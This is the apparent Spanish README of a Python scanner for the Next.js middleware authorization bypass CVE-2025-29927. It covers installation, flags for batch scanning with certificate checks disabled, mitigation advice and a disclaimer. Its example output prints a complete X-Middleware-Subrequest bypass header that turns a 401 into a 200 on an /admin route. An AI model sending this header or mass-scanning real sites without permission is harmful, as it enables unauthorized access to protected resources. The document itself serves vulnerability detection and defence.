
Escáner de bypass de middleware de Next.js
CVE-2025-29927 es una herramienta de seguridad especializada para detectar la vulnerabilidad de omisión de middleware de Next.js (CVE-2025-29927) que afecta a las versiones 11.1.4 a 15.2.2 de Next.js. Esta vulnerabilidad crítica permite a los atacantes omitir los controles de seguridad mediante el envío de una cabecera HTTP especialmente manipulada.
La vulnerabilidad de omisión de middleware de Next.js (CVE-2025-29927) permite a los atacantes eludir los controles de autorización enviando una cabecera maliciosa X-Middleware-Subrequest que confunde la lógica de procesamiento del middleware. Esto puede conducir a un acceso no autorizado a recursos y rutas protegidas.
Puntuación CVSS: 9.1 (Crítica)
# Clone the repository
git clone https://github.com/gotr00t0day/CVE-2025-29927.git
cd CVE-2025-29927
# Install requirements
pip install -r requirements.txt
python CVE-2025-29927.py [-h] [-t TARGET] [-f FILE] [-c CONCURRENCY] [-k] [-s]
-t, --target: Objetivo único para escanear (p. ej., example.com o https://example.com)-f, --file: Archivo que contiene una lista de objetivos (uno por línea)-c, --concurrency: Número de escaneos concurrentes (predeterminado: 5)-k, --insecure: Deshabilita la verificación de certificados SSL (útil para direcciones IP)-s, --silent: Modo silencioso: solo muestra objetivos vulnerablesEscanear un único objetivo:
python CVE-2025-29927.py -t example.com
Escanear múltiples objetivos desde un archivo:
python CVE-2025-29927.py -f targets.txt
Escanear con verificación SSL deshabilitada:
python CVE-2025-29927.py -t 192.168.1.1 -k
Escaneo automatizado con modo silencioso:
python CVE-2025-29927.py -f targets.txt -k -s
Escanear con una cabecera personalizada:
python3 CVE-2025-29927.py -t target -k -s -H "middleware"
Para objetivos vulnerables, MiddleWay muestra:
Ejemplo de salida:
[VULNERABLE] https://example.com - Endpoint /admin can be bypassed
Original status: 401
Bypassed status: 200
Bypass header: X-Middleware-Subrequest: src/middleware:nowaf:src/middleware:src/middleware:src/middleware:src/middleware:middleware:middleware:nowaf:middleware:middleware:middleware:pages/_middleware
Para mitigar esta vulnerabilidad:
X-Middleware-Subrequest en su WAF o a nivel de servidorEsta herramienta se proporciona únicamente para fines de investigación de seguridad y defensa. Obtenga siempre la autorización adecuada antes de escanear cualquier sistema que no sea de su propiedad. Los autores no son responsables del mal uso de esta herramienta.
MIT